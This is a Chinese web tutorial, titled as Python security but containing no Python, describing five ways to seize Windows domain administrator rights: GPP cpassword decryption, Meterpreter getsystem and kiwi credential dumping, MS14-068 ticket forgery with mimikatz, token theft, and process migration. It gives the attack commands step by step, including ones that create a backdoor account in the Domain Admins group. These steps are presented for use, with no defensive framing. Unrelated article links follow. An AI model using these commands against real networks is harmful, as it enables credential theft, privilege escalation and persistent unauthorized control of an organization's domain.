Python安全獲取域管理員權(quán)限幾種方式操作示例
在大多數(shù)情況下,攻擊者可以通過定位域管理員所登錄的服務(wù)器,利用漏洞獲取服務(wù)器system權(quán)限,找到域管理的賬號、進程或是身份驗證令牌,從而獲取域管理員權(quán)限
第1種方式:利用GPP漏洞獲取域管理權(quán)限
SYSVOL是域內(nèi)的共享文件夾,用來存放登錄腳本、組策略腳本等信息。當域管理員通過組策略修改密碼時,在腳本中引入用戶密碼,就可能導(dǎo)致安全問題。
(1)訪問SYSVOL共享文件夾,搜索包含“cpassword”的XML文件,獲取AES加密的密碼。
(2)使用kali自帶的gpp-decrypt進行破解,從而獲取域賬號密碼,直接登錄域管理員賬號獲取訪問權(quán)限。
第2種方式:獲取服務(wù)器明文登錄密碼
使用kiwi模塊需要system權(quán)限,所以我們在使用該模塊之前需要將當前MSF中的shell提升為system。提到system有兩個方法,一是當前的權(quán)限是administrator用戶,二是利用其它手段先提權(quán)到administrator用戶。然后administrator用戶可以直接getsystem到system權(quán)限。
meterpreter > getuid Server username: BYPASS-E97BA3FC\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
加載kiwi模塊
load kiwi
列舉系統(tǒng)中的明文密碼
creds_all
第3種方式:使用MS14-068漏洞進行提權(quán)
MS14068是一個能夠使普通用戶提權(quán)到域控權(quán)限的權(quán)限提升漏洞。攻擊者可以通過構(gòu)造特定的請求包來達到提升權(quán)限的目的。
攻擊流程:
第一步:利用MS14-068偽造生成TGT
MS14-068.exe -u bypass@test.com -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d dc.test.com
第二步:利用mimikatz將工具得到的TGT票據(jù)寫入內(nèi)存,創(chuàng)建緩存證書
mimikatz#kerberos::ptc TGT_bypass@test.com.ccache
第三步:獲取域管理員權(quán)限。創(chuàng)建一個 test 賬號并加入域管理員組,從而隨時可以登錄域控主機進行操作。
PsExec.exe \\dc cmd.exe // 添加test用戶 net user test abc123! /add /domain // 把 test 用戶添加進域管理員組 net group "domain admins" test /add /domain // 查看域管理員 net group "domain admins" /domain
第4種方式:竊取域管理員令牌
當有域控賬戶登陸至服務(wù)器時可使用令牌模擬進行滲透取得域控權(quán)限。
1、入侵域管理員所在的服務(wù)器,竊取域管理員的令牌,從而控制整個域。
2、直接在meterpreter shell上執(zhí)行添加域管理員
add_user test abc123! -h 域控的IP地址 add_group_user "Domain Admins" test -h 域控IP地址
第5種方式:進程遷移
入侵了域管理員所登錄的服務(wù)器,將進程遷移到域管理員所運行的進程,就可以獲得域管理員權(quán)限。
1、獲取域管理員列表
net group "Domain Admins" /domain
2、利用ps找到域管理員(TEST\bypass)所運行的進程,然后將shell進程遷移到域管理員所運行的進程中,成功后就獲得了域管理員權(quán)限。如下圖所示:
3、輸入shell命令獲取OS shell,在本機上使用Windows命令添加新的域管理員:
// 添加test用戶 net user test admin@123 /add /domain // 把 test 用戶添加進域管理員組 net group "domain admins" test /add /domain
4、成功添加了域管理員賬號test。
以上就是Python安全獲取域管理員權(quán)限幾種方式操作示例的詳細內(nèi)容,更多關(guān)于Python獲取域管理員權(quán)限方式的資料請關(guān)注腳本之家其它相關(guān)文章!
相關(guān)文章
基于python實現(xiàn)的百度音樂下載器python pyqt改進版(附代碼)
這篇文章主要介紹了基于python實現(xiàn)的百度音樂下載器python pyqt改進版(附代碼),文中通過示例代碼介紹的非常詳細,對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,需要的朋友可以參考下2019-08-08python中列表添加元素的幾種方式(+、append()、extend())
本文主要介紹了python中列表添加元素的幾種方式(+、append()、extend()),文中通過示例代碼介紹的非常詳細,對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧2022-08-08python實現(xiàn)一個簡單的web應(yīng)用框架
這篇文章主要為大家介紹了使用python寫一個簡單的web應(yīng)用框架實現(xiàn)示例詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進步,早日升職加薪2023-04-04淺談python str.format與制表符\t關(guān)于中文對齊的細節(jié)問題
今天小編就為大家分享一篇淺談python str.format與制表符\t關(guān)于中文對齊的細節(jié)問題,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧2019-01-01python實現(xiàn)多線程暴力破解登陸路由器功能代碼分享
這篇文章主要介紹了python實現(xiàn)多線程暴力破解登陸路由器功能代碼分享,本文直接給出實現(xiàn)代碼,需要的朋友可以參考下2015-01-01python如何利用cv2.rectangle()繪制矩形框
cv2.rectangle這個函數(shù)的作用是在圖像上繪制一個簡單的矩形,下面這篇文章主要給大家介紹了關(guān)于python如何利用cv2.rectangle()繪制矩形框的相關(guān)資料,文中通過示例代碼介紹的非常詳細,需要的朋友可以參考下2022-12-12從零開始學(xué)Python第八周:詳解網(wǎng)絡(luò)編程基礎(chǔ)(socket)
本篇文章主要介紹了從零開始學(xué)Python第八周:詳解網(wǎng)絡(luò)編程基礎(chǔ)(socket) ,具有一定的參考價值,有興趣的可以了解一下。2016-12-12